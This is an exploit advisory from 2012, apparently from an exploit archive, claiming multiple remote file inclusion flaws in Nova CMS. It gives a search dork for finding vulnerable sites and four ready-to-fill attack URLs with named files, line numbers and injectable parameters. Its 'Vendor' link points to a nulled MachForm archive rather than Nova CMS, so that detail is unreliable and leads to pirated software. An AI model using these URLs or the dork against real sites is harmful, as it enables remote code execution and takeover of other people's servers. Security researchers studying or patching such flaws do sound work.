Nova CMS suffers from multiple remote file inclusion vulnerabilities.
9ae18fcb0e487affa891a9dbe09003a50ade0d58d4de98b74f8be7279c6b81e4
==========================
Nova CMS RFI Vulnerability
==========================
# Vendor: https://canopus.oron.com/i755lr7evek7np4dpndrvbqcqhs3uj4igorbmlhaqwglgek3qc2old7whll7z4mlrtcyk73t/MachForm.v2.4.PHP.NULL-DGT.zip
# Date: 2012-1-27
# Author : indoushka
########################################################
# Exploit By indoushka
-------------
dork : Copyright ©2005-2011 by Nova CMS
Function: include File: index.php Line: 182
Exploit: https://localhost/novacms/optimizer/index.php?fileType=[EV!L]
##################################################
Function: include File: moduleslist.php Line: 182
Exploit: https://localhost/novacms/administrator/modules/moduleslist.php?id}=[EV!L]
##################################################
Function: require_once File: gets.php Line: 8
Exploit: https://localhost/novacms/includes/function/gets.php?filename=[EV!L]
##################################################
Function: require File: usertpl.php Line: 60
Exploit: https://localhost/novacms/includes/function/usertpl.php?conf[blockfile]}=[EV!L]
##################################################
----------------------------------------------------------